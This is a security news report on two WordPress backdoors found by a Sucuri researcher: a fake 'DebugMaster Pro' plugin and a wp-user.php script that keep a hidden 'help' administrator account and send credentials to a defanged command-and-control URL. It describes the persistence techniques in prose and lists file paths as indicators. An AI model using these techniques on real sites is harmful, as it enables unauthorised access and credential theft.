Security researcher Puja Srivastava from Sucuri uncovered two malicious files designed to guarantee persistent attacker access by manipulating administrator accounts in a compromised WordPress website. The case highlights how threat actors disguise backdoors as legitimate WordPress components, making detection and remediation far more difficult.
The first backdoor was found at ./wp-content/plugins/DebugMaster/DebugMaster.php, masquerading as a plugin called DebugMaster Pro.
“This ‘DebugMaster Pro’ plugin disguised itself as a legitimate developer tool, but its hidden functions created an administrator user with hardcoded credentials. It also included code to hide itself from plugin listings and could send stolen information to a remote server,” Srivastava explained.
The plugin stealthily generated a new administrator account named help, ensuring it always retained administrator privileges. It then exfiltrated the credentials (username, password, email, and server IP) to a command-and-control server, with the endpoint obfuscated and resolved to hxxps://kickstar-xbloom[.]info/collect[.]php.
Additionally, it injected external scripts into the website that executed for all visitors except administrators or whitelisted IPs. These scripts were designed to log administrator IP addresses and potentially deliver further malicious payloads.
The second malicious file was discovered at the root of the site as ./wp-user.php. While simpler, it was no less dangerous.
Srivastava noted, “The goal of this file is to maintain a specific administrator account… It checks the existing WordPress users and if it found the username help, it deleted that user and recreated it with the attacker’s chosen password. Otherwise, it simply created a fresh help administrator account.”
This meant that even if site owners deleted the rogue admin user or changed its credentials, the script would simply recreate the account on the next execution, ensuring attackers always retained access.
Sucuri recommends website administrators look for these red flags:
- Unknown files such as ./wp-content/plugins/DebugMaster/DebugMaster.php or ./wp-user.php.
- Hidden administrator accounts not visible in the standard user list.
- Reappearing administrator users even after deletion.
The combination of DebugMaster Pro and wp-user.php created a resilient persistence mechanism. As Srivastava explained, “Both files create or re-create administrator-level accounts. The design of both files ensures that even if you try to clean up, the malicious users or code can reappear, making full recovery very difficult without expert help.”
By exfiltrating credentials, hiding plugin listings, and regenerating administrator users, attackers could maintain long-term control over compromised websites, inject spam, redirect visitors, or steal sensitive information.
